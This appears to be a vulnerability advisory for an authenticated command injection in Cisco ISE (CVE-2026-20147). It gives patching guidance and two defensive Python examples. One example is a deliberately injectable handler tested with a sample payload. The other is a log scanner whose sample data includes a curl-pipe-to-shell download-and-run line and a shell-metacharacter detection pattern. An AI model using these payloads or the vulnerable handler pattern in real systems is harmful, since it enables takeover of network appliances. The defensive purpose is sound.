Critical (9.9)

Cisco ISE authenticated command execution (CVE-2026-20147)

Patch now: CVE-2026-20147 is a critical OS command injection in Cisco ISE and ISE-PIC that lets an authenticated administrator run commands on the underlying operating system, escalate to root, and cause a denial of service. Update affected appliances to a fixed release per the Cisco advisory.

Overview

A critical vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) allows an authenticated administrator to execute arbitrary commands on the appliance's underlying operating system. Tracked as CVE-2026-20147 with a CVSS base score of 9.9, the flaw stems from insufficient validation of user-supplied input in the web-based management interface.

Vulnerability Details

The vulnerability exists because the affected software does not sufficiently validate user-supplied input in specific HTTP requests to the web-based management interface. An attacker who holds valid administrative credentials can exploit it by sending a crafted HTTP request to the affected device.

A successful exploit gives the attacker command execution on the underlying operating system as a non-root user. From that foothold the attacker can escalate privileges to root and take complete control of the appliance. On a single-node ISE deployment, exploitation can also make the node unavailable, a denial-of-service (DoS) condition that stops new endpoints from authenticating to the network until service is restored.
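The bug class described above, as an added illustration that is not Cisco's code and does not reflect the real ISE handler or parameter: a hypothetical admin-only diagnostic endpoint that splices a request parameter into a shell command line, beside the hardened form. `echo` stands in for a real diagnostic tool so the example runs offline.

```python
import re
import subprocess

# Added illustration of OS command injection in a management web handler.
# The handler, its `host` parameter and the use of `echo` in place of a
# real diagnostic tool are assumptions made for this example; none of it
# is Cisco ISE code.

# Allow-list for a hostname or IPv4 literal: letters, digits, dots, hyphens.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")


def vulnerable_diag(host: str) -> str:
    """Vulnerable handler: the admin-supplied value becomes shell syntax.

    shell=True hands the whole string to /bin/sh, so ';', '|', '$(...)'
    and backticks in `host` are interpreted as commands, not data.
    """
    cmd = f"echo diag {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_diag(host: str) -> str:
    """Hardened handler with the two changes that close the hole.

    1. Allow-list validation of the value, regardless of the caller's
       privilege level: an administrator is still untrusted input to the OS.
    2. No shell: the command is an argv list, so `host` is passed to the
       program as one argument and is never parsed by /bin/sh.
    """
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host parameter: {host!r}")
    return subprocess.run(["echo", "diag", host], capture_output=True, text=True).stdout


def demo() -> dict:
    """Run both handlers on a constructed injection payload."""
    payload = "10.0.0.1; echo INJECTED"   # constructed attacker input
    result = {"vulnerable": vulnerable_diag(payload)}
    try:
        hardened_diag(payload)
        result["hardened"] = "accepted"
    except ValueError as exc:
        result["hardened"] = str(exc)
    return result


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out!r}")
```

The vulnerable handler returns `diag 10.0.0.1` followed by `INJECTED` on its own line, proving the second command ran; the hardened handler rejects the same value before any process is spawned. Quoting the value with `shlex.quote` while keeping `shell=True` also stops the injection, but dropping the shell entirely removes the parser that made the bug possible, and the allow-list catches values that are well-formed shell input but still wrong for the parameter.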

Affected Products

This vulnerability affects the following Cisco products:

  • Cisco Identity Services Engine (ISE)
  • Cisco Identity Services Engine Passive Identity Connector (ISE-PIC)

Administrators should consult the official Cisco Security Advisory for a detailed list of affected software versions. Cisco has released software updates that address this vulnerability.

Remediation and Mitigation

The primary and most effective action is to apply the relevant patch provided by Cisco. There are no workarounds that address this vulnerability.

Immediate Action Required:

  1. Patch: Upgrade affected devices to a fixed software version as listed in the security advisory. This is the only complete remediation.
  2. Principle of Least Privilege: Strictly enforce the principle of least privilege for administrative accounts. Since exploitation requires admin credentials, limiting the number of users with this level of access reduces the attack surface.
  3. Network Controls: As a general best practice, restrict management interface access to trusted source IP addresses using network access control lists (ACLs).

While this vulnerability is not currently listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog, its critical severity and potential impact warrant urgent patching.

Security Insight

This vulnerability highlights the persistent risk of improper input validation in network management interfaces, even for credentialed users. It echoes the pattern seen in incidents like the Interlock ransomware group’s exploitation of a Cisco FMC zero-day, where administrative access was leveraged for deeper system compromise. For critical infrastructure components such as network access control systems, every request parameter must be validated and kept out of shell command lines regardless of the caller’s privilege level: an authenticated administrator is still untrusted input from the operating system’s point of view.

Update - May 2026

Since original publication on April 15, Cisco has not released a security patch for CVE-2026-20147 as of May 10. The advisory remains unchanged, with no updated workarounds or fixed software versions posted. The vulnerability is not yet added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, though monitoring is advised given the CVSS 9.9 critical rating.

Exploitation probability as estimated by EPSS has moved slightly, from 0.00284 (52nd percentile) to 0.0028 (still 52nd percentile), consistent with no observed increase in exploitation activity in the telemetry that feeds the model. No proof-of-concept code or active exploitation reports have been confirmed publicly.

Two further Cisco ISE advisories were disclosed in late April: CVE-2026-20152 (Cisco ISE privilege escalation) and CVE-2026-20164 (Cisco ISE-PIC information disclosure). Defenders should treat them as part of the same administrative attack surface.

Recommended actions: Keep monitoring the Cisco PSIRT advisory for fixed releases. The advisory lists no workaround, so rely on compensating controls until a patch is applied: keep administrative accounts to the minimum needed, block inbound management access to ISE nodes from untrusted networks, and review administrator audit logs for requests carrying shell metacharacters or unexpected command execution by admin accounts. Treat the vulnerability as open until a fixed release is installed.
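The log review recommended above, as an added, constructed example. The key=value audit format and the sample lines are hypothetical, written for this illustration; they are not Cisco ISE's real audit or syslog schema, so adapt the line regex to the fields your collector actually exports. The detection itself is generic: decode each request parameter and flag any value containing characters that change how /bin/sh parses a command line.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Added, constructed example of reviewing admin audit logs for command
# injection attempts. Line format, node name, users, paths and addresses
# are all hypothetical; this is not Cisco ISE's real log schema.
SAMPLE_LINES = [
    "2026-05-02T10:14:03Z ise-node1 admin-audit user=alice src=10.1.1.5 "
    "method=POST path=/admin/policy/export params=format%3Dcsv",
    "2026-05-02T10:14:09Z ise-node1 admin-audit user=alice src=10.1.1.5 "
    "method=POST path=/admin/diag/run params=host%3D10.0.0.1%3Bid",
    "2026-05-02T10:15:41Z ise-node1 admin-audit user=bob src=203.0.113.9 "
    "method=GET path=/admin/status params=",
    "2026-05-02T10:16:02Z ise-node1 admin-audit user=bob src=203.0.113.9 "
    "method=POST path=/admin/diag/run "
    "params=host%3D%24%28curl%20http%3A%2F%2F203.0.113.9%2Fx%7Csh%29",
]

# Assumed record layout: space-separated key=value fields, params URL-encoded.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<node>\S+) admin-audit user=(?P<user>\S+) src=(?P<src>\S+) "
    r"method=(?P<method>\S+) path=(?P<path>\S+) params=(?P<params>\S*)$"
)

# Characters that alter shell parsing. A legitimate hostname, file name or
# policy name never needs any of them.
SHELL_META_RE = re.compile(r"[;|&`$()<>\n]")


def flag_suspicious(lines):
    """Return one hit per request parameter whose value contains shell metacharacters.

    Each hit records the 1-based line number, acting user, source address,
    request path, parameter name, decoded value and the sorted set of
    metacharacters found, so a reviewer can pivot on user or source.
    """
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an admin-audit record in the assumed format
        # Decode the encoded body once, then let parse_qsl decode each value
        # again so double-encoded payloads (%2524 -> %24 -> $) are also caught.
        decoded = unquote_plus(m["params"])
        for key, value in parse_qsl(decoded, keep_blank_values=True):
            meta = sorted(set(SHELL_META_RE.findall(value)))
            if meta:
                hits.append({
                    "line": lineno,
                    "ts": m["ts"],
                    "user": m["user"],
                    "src": m["src"],
                    "path": m["path"],
                    "param": key,
                    "value": value,
                    "meta": meta,
                })
    return hits


if __name__ == "__main__":
    for h in flag_suspicious(SAMPLE_LINES):
        print(f"line {h['line']}: user={h['user']} src={h['src']} "
              f"{h['path']} {h['param']}={h['value']!r} meta={h['meta']}")
```

On the sample data this flags lines 2 and 4 only: the legitimate CSV export and the empty-parameter status request pass, while the `;id` suffix and the `$(curl ...|sh)` download-and-run payload are both surfaced with the user and source address that sent them. Expect some false positives from parameters that legitimately carry free text (descriptions, regular expressions); scope the rule to endpoints that take hostnames, file names or other constrained values, or allow-list those parameters, rather than loosening the metacharacter set.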
